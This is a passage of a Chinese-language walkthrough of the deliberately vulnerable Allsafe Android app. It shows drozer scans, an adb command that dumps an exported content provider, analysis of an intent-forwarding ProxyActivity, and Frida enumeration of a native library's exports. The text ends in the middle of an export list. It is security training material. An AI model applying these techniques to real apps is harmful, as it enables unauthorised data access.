LEAKED THROUGH AN INS TEAM SAID IT'S EASY N INSECURE CONTENT PROVIDER. FORTUNATELY, THE DEV AN TO SECURE ANDROID INTER PROCESS COMMUNICATION. THE APP APP A E WITH OTHER APPS... PP ALSO PROVIDES ACCESS TO SOME FILES WHICH WE SHARE WIL E FILE LEAK. CAN YOU CHECK IF THE IMPLEMENTATION IS GOO 5 GOOD ENOUGH? ALLSAFE CAN'T AFFORD ANOTHER SENSITIVE --&gt; <img src="./images/img-40.png" alt="Figure 40" />挑战中提到我们有两个不安全的内容提供商,第一个是数据库提供商,第二个是文件提供商</p> <p>但我们用drozer扫的时候只有一个是可导出状态,</p> <pre><code>dz&gt; run app.package.attacksurface infosecadventures.allsafe Attempting to run shell module Attack Surface: 3 activities exported 2 broadcast receivers exported 1 content providers exported 1 services exported is debuggable dz&gt; run app.service.info -a infosecadventures.allsafe Attempting to run shell module Package: infosecadventures.allsafe infosecadventures.allsafe.challenges.RecorderService Permission: null </code></pre> <p>我们去AndroidMainfest.xml文件看看,那个是可导出,呢个不可导出</p> <p>我们可以看到数据提供商是可导出的,文件提供商是不可导出的</p> <p>&lt;!-- 这是一张图片,ocr 内容为:&lt;PROVIDER ANDROID:NAME:"INFOSECADVENTURES.ALLSAFE.CHALLENGES.DATAPROVIDEN" ANDROID:ENABLEDTRUE" ANDROID:EXPORTED"TRUE" ANDROID:AUTHORITIES-"INFOSECADVENTURES.ALLSAFE.DATAPROVIDER"/&gt; &lt;PROVIDER ANDROID:NAME:"ANDROIDX.CORE.CONTENT.FILEPROVIDER" ANDROID:EXPORTED"FALSE" ANDROID:AUTHORITIES-"INFOSECADVENTURES.ALLSAFE.FILEPROVIDER" ANDROID:GRANTURIPERMISSIONS"TRVE"&gt; &lt;META-DATA ANDROID:NAME-"ANDROID.SUPPORT.FILE.PROVIDER PATHS" ANDROID:RESOURCE"@XML/PROVIDER_PATHS"/&gt; --&gt; <img src="./images/img-41.png" alt="Figure 41" /></p> <p>我们先利用数据的可导出性,看看有啥东西</p> <pre><code>PS C:\Users\35159&gt; adb shell content query --uri "content://infosecadventures.allsafe.dataprovider" Row: 0 id=1, user=admin, note=I can not believe that Jill is still using 123456 as her password... Row: 1 id=2, user=elliot.alderson, note=A bug is never just a mistake. It represents something bigger. An error of thinking. That makes you who you are. Row: 2 id=3, user=darlene.alderson, note=That’s the trick about money. Banks care more about it than anything else. Row: 3 id=4, user=gideon.goddard, note=You’re never sure about anything unless there’s something to be sure about. </code></pre> <p>虽然文件没有导出,但FileProvider 的 grantUriPermissions="true" 这意味着 AllSafe 应用中的其他组件 (例如已导出的 Activity)可以使用 Intent 和已授权的 URI 与该提供程序进行交互。</p> <p>通常是通过 Intent 中的 FLAG_GRANT_READ_URI_PERMISSION 或 FLAG_GRANT_WRITE_URI_PERMISSION 标志。但是,要实现这一点,应用必须显式地共享一个 URI。</p> <p>如果 AllSafe 应用中存在导出的活动、服务或广播接收器,可以接受指向 FileProvider 管理的文件的 URI 的 Intents ,那么我们就可以滥用此机制来读取或写入应该受到限制的文件。</p> <p>要有效利用 FileProvider ,你需要弄清楚通过 URI 共享的文件的真实路径 。Android 的 FileProvider 不会直接暴露完整的文件路径;相反,它使用 URI 映射到某些预定义目录中的文件。</p> <p>在他下面可以看到xml文件的名字</p> <p>&lt;!-- 这是一张图片,ocr 内容为:SMETA-DATA ANDROID:NAME-"ANDROID.SUPPORT.FILE_PROVIDER_PATHS" ANDROID:RESOURCE"@XML/PROVIDER_PATHS"/&gt; --&gt; <img src="./images/img-42.png" alt="Figure 42" /></p> <p>直接去找</p> <p>&lt;!-- 这是一张图片,ocr 内容为:&lt;?XML VERSION:"1.0" ENCODING:"UTF-8"?&gt; &amp;PATHS&gt; &lt;FILES-PATH NAME"FILES" PATH &lt;/PATHS&gt; --&gt; <img src="./images/img-43.png" alt="Figure 43" /></p> <p>&lt;files-path&gt; 元素表明 FileProvider 已配置为公开应用程序内部存储 files/ 目录下的文件。具体来说, path="." 表示应用程序内部 files/ 目录中的所有文件都可能通过 FileProvider 访问。</p> <p>files-path 指的是应用程序的内部存储位置 /data/data/infosecadventures.allsafe/files/</p> <p>由于 path="." ,因此可以访问该目录中的所有文件</p> <p>现在,是时候在 AllSafe 应用中寻找其他组件 (如导出的活动),以便使用 Intent 和授权 URI 与提供商进行交互。</p> <p>看作者的wp发现有一个名为 ProxyActivity 导出活动,它将 intent 作为额外的参数传递。</p> <p>&lt;!-- 这是一张图片,ocr 内容为:JADX INFO:LOADEDFROM:CLASSESSES5.DEX */ PUBLIC CLASS PROXYACTIVITY EXTENDS APPCOMPATACTIVITY ( IL ONDRETER RRINT RRAYMORTEETS ENTEETS, ONTS ETIVETIVETIVITEETIVITEETIVITEETS, ETIVITE ETIVIT @OVERRIDE // AN PROTECTED VOID ONCREATE(BUNDLE SAVEDINSTANCESTATE) { SUPER.ONCREATE(SAVEDINSTANCESTATE); STARTACTIVITY((INTENT) GETINTENT().GETPARCELABLEEXTRA("EXTRA.INTENT'); --&gt; <img src="./images/img-44.png" alt="Figure 44" /></p> <p>由于该活动会被导出,且似乎并未验证额外信息的意图或来源, 因此攻击者可能利用此漏洞触发任意活动 ,例如启动一个带有恶意意图的活动。这意味着任何包含名为 "extra_intent" 的额外信息的意图都可能导致 ProxyActivity 启动另一个活动,而 "extra_intent" 的内容可能由攻击者控制。</p> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Native Library &lt;/font&gt;</h1> <p>本地so库在native层</p> <p>在frida交互界面</p> <p>位置在</p> <pre><code>[Android Emulator 5554::Allsafe ]-&gt; Process.findModuleByName("libnative_library.so") { "base": "0x763879583000", "name": "libnative_library.so", "path": "/data/app/infosecadventures.allsafe-CW6W470gPQ-sX6s2-BUJPA==/lib/x86_64/libnative_library.so", "size": 311296, "version": null } </code></pre> <p>导出的函数有</p> <pre><code>[Android Emulator 5554::Allsafe ]-&gt; m.enumerateExports().map(e =&gt; e.name) [ "_ZN7_JNIEnv24ReleaseByteArrayElementsEP11_jbyteArrayPai", "_ZTSPw", "_ZdaPvmSt11align_val_t", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5rfindEcm", "_ZNSt6__ndk14stodERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm", "_ZTSPx", "__cxa_throw", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4nposE", "_ZTSPy", "_ZNSt10bad_typeidD0Ev", "_ZNSt6__ndk111char_traitsIcE6lengthEPKc", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignERKS5_mm", "__cxa_deleted_virtual", "_ZNSt11logic_errorD0Ev", "_ZTISt13runtime_error", "_ZNSt6__ndk111char_traitsIwE4moveEPwPKwm", "_ZNSt6__ndk14stolERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi", "_ZNSt9exceptionD2Ev", "__cxa_unexpected_handler", "_ZNSt9bad_allocD2Ev", "_ZNSt11range_errorD2Ev", "_ZNSt12out_of_rangeD2Ev", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE12find_last_ofEPKcmm", "_ZNSt9type_infoD2Ev", "_ZNSt12domain_errorD0Ev", "_ZNSt16invalid_argumentD2Ev", "_ZNSt20bad_array_new_lengthD2Ev", "_ZTISt9exception", "_ZTIPa", "_Z14jstring2stringP7_JNIEnvP8_jstring", "_ZNSt6__ndk14stoiERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi", "_ZTIPb", "_ZTIDh", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEaSERKS5_", "_ZTIPc", "_ZTIDi", "_ZNKSt8bad_cast4whatEv", "_ZN7_JNIEnv14DeleteLocalRefEP8_jobject", "_ZNSt13runtime_errorC2ERKS_", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4copyEPcmm", "__cxa_rethrow", "_ZTIPd", "_ZTVN10__cxxabiv129__pointer_to_member_type_infoE", "_ZN7_JNIEnv16CallObjectMethodEP8_jobjectP10_jmethodIDz", "_ZNSt11logic_errorC1ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmPKc", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4findEwm", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmPKwm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4nposE", "_ZTVSt13runtime_error", "_ZSt17__throw_bad_allocv", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmRKS5_mm", "_ZTSN10__cxxabiv120__function_type_infoE", "_ZTIPf", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEED2Ev", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE9__grow_byEmmmmmm", "_ZTIPg", "_ZN7_JNIEnv14GetObjectClassEP8_jobject", "_ZTIN10__cxxabiv120__function_type_infoE", "_ZTIDn", "_ZTIPh", "_ZTIPKa", "_ZTSSt8bad_cast", "_ZN7_JNIEnv11GetMethodIDEP7_jclassPKcS3_", "_ZNSt13runtime_erroraSERKS_", "__cxa_free_exception", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmPKw", "_ZNSt6__ndk15stoulERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi", "_ZSt14get_unexpectedv", "_ZTIPKb", "_ZTIPi", "_ZNKSt20bad_array_new_length4whatEv", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmRKS5_mm", "_ZTIPKc", "_ZTIPj", "_ZNSt8bad_castD2Ev", "_ZTIPKd", "_ZNSt11logic_errorC1EPKc", "_ZTIPl", "_ZdaPvm", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEmc", "_ZTIPm", "_ZTIPKf", "_ZTIDs", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5rfindEwm", "_ZSt15get_new_handlerv", "__cxa_demangle", "_ZTIPn", "_ZTIPKg", "_ZTSSt15underflow_error", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendERKS5_mm", "__cxa_call_unexpected", "_ZTIPKh", "_ZTIPo", "_ZTIDu", "_ZTIPKi", "_Znam", "_ZSt13set_terminatePFvvE", "_ZSt15set_new_handlerPFvvE", "_ZTIPKj", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE21__grow_by_and_replaceEmmmmmmPKw", "_ZTVSt16invalid_argument", "_ZTIN10__cxxabiv119__pointer_type_infoE", "_ZTIa", "_ZTIPs", "_ZTIPKl", "__cxa_begin_catch", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE17find_first_not_ofEPKcmm", "_ZTSN10__cxxabiv116__shim_type_infoE", "_ZTIb", "_ZTIPt", "_ZTIPKm", "_ZTVSt9bad_alloc", "_Z18hardcoreEncryptionP7_JNIEnvP8_jstring", "_ZNSt9bad_allocC1Ev", "_ZTIc", "_ZTIPKn", "_ZNSt14overflow_errorD2Ev", "_ZNSt12length_errorD1Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5eraseEmm", "_ZTIPv", "_ZTIPKo", "_ZTId", "_ZNSt13bad_exceptionD2Ev", "_ZNSt13runtime_errorC2EPKc", "_ZNSt6__ndk1plIcNS_11char_traitsIcEENS_9allocatorIcEEEENS_12basic_stringIT_T0_T1_EEPKS6_RKS9_", "_ZTVSt12out_of_range", "_ZTIPw", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2IDnEEPKc", "_ZdaPvSt11align_val_tRKSt9nothrow_t", "_ZNSt6__ndk110to_wstringEd", "_ZTIPx", "_ZTIf", "_ZNSt20bad_array_new_lengthC1Ev", "__gxx_personality_v0", "_ZTIPy", "_ZTIg", "_ZNSt11logic_errorC2ERKS_", "_ZNSt13runtime_errorC2ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE", "_ZNSt6__ndk110to_wstringEf", "__cxa_uncaught_exception", "_ZTIh", "_ZTIPKs", "_ZTSSt13bad_exception", "_ZTVSt11range_error", "_ZNSt15underflow_errorD2Ev", "_ZTVSt9type_info", "_ZdlPvmSt11align_val_t", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9__grow_byEmmmmmm", "_ZNSt6__ndk110to_wstringEg", "_ZTIPKt", "_ZTIi", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEaSEw", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5eraseEmm", "_ZTIj", "_ZNSt6__ndk15stoldERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm", "_ZNSt6__ndk110to_wstringEi", "_ZTIPKv", "_ZNSt9exceptionD0Ev", "_ZNSt9bad_allocD0Ev", "_ZNSt11range_errorD0Ev", "_ZNSt13runtime_errorD1Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED1Ev", "_ZdaPv", "_ZNSt6__ndk110to_wstringEj", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_mmRKS4_", "_ZTIPKw", "_ZTIl", "_ZNSt12out_of_rangeD0Ev", "_ZNSt11logic_erroraSERKS_", "_ZTIm", "_ZTIPKx", "_ZNSt16invalid_argumentD0Ev", "_ZTSSt14overflow_error", "_ZNSt9type_infoD0Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEPKc", "_ZNSt6__ndk110to_wstringEl", "__cxa_get_globals", "_ZTVN10__cxxabiv119__pointer_type_infoE", "_ZTIPKy", "_ZTIn", "_ZNSt20bad_array_new_lengthD0Ev", "_ZNKSt10bad_typeid4whatEv", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEPKw", "_ZNSt6__ndk110to_wstringEm", "_ZTIo", "_ZTVN10__cxxabiv121__vmi_class_type_infoE", "_ZTSSt9exception", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmPKcm", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_RKS4_", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_RKS4_", "_ZNKSt9exception4whatEv", "_ZNSt8bad_castC1Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4findEPKwmm", "_ZTIN10__cxxabiv117__array_type_infoE", "_ZTVSt15underflow_error", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5rfindEPKcmm", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEPKc", "_ZNSt6__ndk16stoullERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi", "_ZTVSt12domain_error", "_ZNSt10bad_typeidC2Ev", "_ZTVN10__cxxabiv116__shim_type_infoE", "_ZTIs", "Java_infosecadventures_allsafe_challenges_NativeLibrary_checkPassword", "_ZSt7nothrow", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE21__grow_by_and_replaceEmmmmmmPKc", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEPKwm", "_ZTIt", "_ZdlPvSt11align_val_tRKSt9nothrow_t", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEPKcmm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEPKwmm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE9push_backEw", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKc", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEPKw", "_ZTIv", "_ZTIN10__cxxabiv121__vmi_class_type_infoE", "_ZTSSt20bad_array_new_length", "_ZTISt16invalid_argument", "_ZTIw", "_ZTSPKDh", "__cxa_new_handler", "_ZTIx", "_ZTSPKDi", "_ZTVN10__cxxabiv117__pbase_type_infoE", "_ZNSt8bad_castD0Ev", "_ZNSt6__ndk16__itoa8__u32toaEjPc", "_ZTISt9bad_alloc", "_ZTIy", "_ZTSN10__cxxabiv117__array_type_infoE", "_ZNSt6__ndk117__compressed_pairINS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5__repES5_EC2INS_18__default_init_tagESA_EEOT_OT0_", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEPKcm", "__cxa_end_catch", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmPKwm", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmPKw", "_ZNSt6__ndk110to_wstringEx", "_ZSt10unexpectedv", "_ZTIPDh", "_ZNSt10bad_typeidD1Ev", "_ZNSt6__ndk110to_wstringEy", "_ZTIPDi", "_ZNSt11logic_errorD1Ev", "_ZSt13get_terminatev", "_ZTIN10__cxxabiv116__shim_type_infoE", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEmc", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertENS_11__wrap_iterIPKcEEc", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEmw", "_ZTVN10__cxxabiv117__class_type_infoE", "_ZTSPKDn", "_ZdlPvSt11align_val_t", "_ZNKSt6__ndk121__basic_string_commonILb1EE20__throw_out_of_rangeEv", "_ZNSt12domain_errorD1Ev", "_ZdlPv", "_ZTISt9type_info", "_ZNSt6__ndk15stollERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi", "_ZTVN10__cxxabiv120__si_class_type_infoE", "_ZTIPDn", "_ZTSN10__cxxabiv116__enum_type_infoE", "_ZTISt8bad_cast", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertENS_11__wrap_iterIPKwEEw", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE17find_first_not_ofEPKwmm", "_ZTSPKDs", "_ZTVSt11logic_error", "__cxa_rethrow_primary_exception", "_ZNSt14overflow_errorD0Ev", "_ZTSSt16invalid_argument", "_ZTISt10bad_typeid", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_mmRKS4_", "_ZTSPKDu", "_ZNSt13bad_exceptionD0Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_RKS4_", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_RKS4_", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_", "_ZTIPDs", "_ZTISt12out_of_range", "_ZTIPDu", "_ZNSt6__ndk14stofERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm", "_ZTSPKa", "_ZNSt15underflow_errorD0Ev", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmmw", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmRKS5_mm", "_ZNSt6__ndk14stolERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi", "_ZTSPKb", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEPKwm", "_ZNSt6__ndk14stoiERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi", "_ZTISt13bad_exception", "_ZTSPKc", "_ZTSSt12out_of_range", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7reserveEm", "__cxa_get_globals_fast", "_ZTSPKd", "_ZTISt11range_error", "_ZnwmRKSt9nothrow_t", "_ZTVSt12length_error", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmRKS5_mm", "_ZTSPKf", "__emutls_get_address", "_ZTSPKg", "_ZnamSt11align_val_tRKSt9nothrow_t", "_ZNKSt6__ndk121__basic_string_commonILb1EE20__throw_length_errorEv", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKcm", "__cxa_terminate_handler", "_ZTSPKh", "_ZnwmSt11align_val_t", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm", "_ZTSPKi", "_ZTSPKj", "_ZTVN10__cxxabiv116__enum_type_infoE", "_ZNSt11logic_errorC2ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE", "_ZTVSt13bad_exception", "_ZTSPKl", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE2atEm", "_ZNSt6__ndk14stodERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm", "_ZTSPKm", "_ZNSt9bad_allocC2Ev", "_ZNSt13runtime_errorC1ERKS_", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_mmRKS4_", "_ZTIN10__cxxabiv129__pointer_to_member_type_infoE", "_ZTSPKn", "_ZNSt12length_errorD2Ev", "_ZTVSt8bad_cast", "_ZTSPKo", "_ZN7_JNIEnv14GetArrayLengthEP7_jarray", "_ZNSt11logic_errorC2EPKc", "_ZNSt20bad_array_new_lengthC2Ev", "_ZTVSt20bad_array_new_length", "_ZTISt12domain_error", "_ZTSSt12domain_error", "_ZTISt14overflow_error", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEmc", "__cxa_get_exception_ptr", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7reserveEm", "_ZTSSt9bad_alloc", "_ZNKSt11logic_error4whatEv", "_ZTSSt11range_error", "_ZTSPKs", "_ZTIN10__cxxabiv116__enum_type_infoE", "_ZNSt6__ndk19to_stringEd", "_ZTSPKt", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmRKS5_mm", "_ZNSt9bad_allocD1Ev", "_ZNSt9exceptionD1Ev", "_ZNSt13runtime_errorD2Ev", "_ZNSt11range_errorD1Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED2Ev", "_ZNSt12out_of_rangeD1Ev", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE2atEm", "_ZNSt6__ndk19to_stringEf", "_ZTSPKv", "_ZNKSt13bad_exception4whatEv", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSEc", "_ZNSt16invalid_argumentD1Ev", "_ZNSt6__ndk19to_stringEg", "_ZTIN10__cxxabiv123__fundamental_type_infoE", "_ZTSPKw", "_ZNSt9type_infoD1Ev", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEmw", "_ZNSt6__ndk15stoulERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi", "_ZTSPKx", "_ZTIPKDh", "_ZNSt20bad_array_new_lengthD1Ev", "_ZTSSt9type_info", "_ZdlPvRKSt9nothrow_t", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmRKS5_mm", "_ZNSt6__ndk19to_stringEi", "_ZTSPKy", "_ZTIPKDi", "_ZNSt6__ndk19to_stringEj", "__cxa_pure_virtual", "_ZTVN10__cxxabiv120__function_type_infoE", "_ZNSt8bad_castC2Ev", "_ZSt14set_unexpectedPFvvE", "_ZTSN10__cxxabiv121__vmi_class_type_infoE", "_ZNSt6__ndk16__itoa8__u64toaEmPc", "_ZNSt6__ndk19to_stringEl", "__dynamic_cast", "_ZNSt6__ndk19to_stringEm", "_Z9checkPassP7_JNIEnvP8_jstring", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6resizeEmc", "_ZNSt6__ndk15stoldERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm", "_ZTIPKDn", "_ZnamSt11align_val_t", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4copyEPwmm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEED1Ev", "_ZTISt11logic_error", "_ZN7_JNIEnv12NewStringUTFEPKc", "_ZTSN10__cxxabiv119__pointer_type_infoE", "_ZTSa", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5rfindEPKwmm", "_ZTSb", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE16find_last_not_ofEPKwmm", "__cxa_uncaught_exceptions", "_ZTSN10__cxxabiv129__pointer_to_member_type_infoE", "_ZTSc", "_ZNSt8bad_castD1Ev", "_ZNSt13runtime_errorC1EPKc", "_ZTSd", "_ZTIPKDs", "_Znwm", "_ZdaPvRKSt9nothrow_t", "_ZNSt11logic_errorC1ERKS_", "_ZNSt10bad_typeidD2Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmmc", "_ZTSPDh", "_ZTSf", "_ZTIPKDu", "_ZNSt11logic_errorD2Ev", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_mmRKS4_", "_ZTIN10__cxxabiv117__pbase_type_infoE", "_ZTSg", "_ZTSPDi", "_ZTSh", "_ZTSSt13runtime_error", "_ZNSt13runtime_errorC1ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE", "_ZNSt6__ndk19to_stringEx", "_ZTSi", "_ZNSt12domain_errorD2Ev", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKc", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE2atEm", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE13find_first_ofEPKwmm", "_ZNSt6__ndk19to_stringEy", "_ZTSj", "_ZNKSt9bad_alloc4whatEv", "_ZTVSt10bad_typeid", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEPKcmm", "_ZTISt12length_error", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmPKwm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEPKwm", "__cxa_free_dependent_exception", "_ZTIN10__cxxabiv117__class_type_infoE", "_ZTSPDn", "_ZTSl", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKcm", "__cxa_current_exception_type", "_ZTSPa", "_ZTSm", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignERKS5_mm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmPKw", "_ZTSPb", "_ZTSn", "_ZTSDh", "_ZTISt20bad_array_new_length", "_ZTSSt11logic_error", "_ZNSt14overflow_errorD1Ev", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE16find_last_not_ofEPKcmm", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE2atEm", "_ZNSt13bad_exceptionD1Ev", "_ZTSN10__cxxabiv117__pbase_type_infoE", "_ZTSPc", "_ZTSo", "_ZTSDi", "_ZTSN10__cxxabiv120__si_class_type_infoE", "_ZNKSt13runtime_error4whatEv", "_ZNSt12length_errorD0Ev", "_ZTSSt12length_error", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEmw", 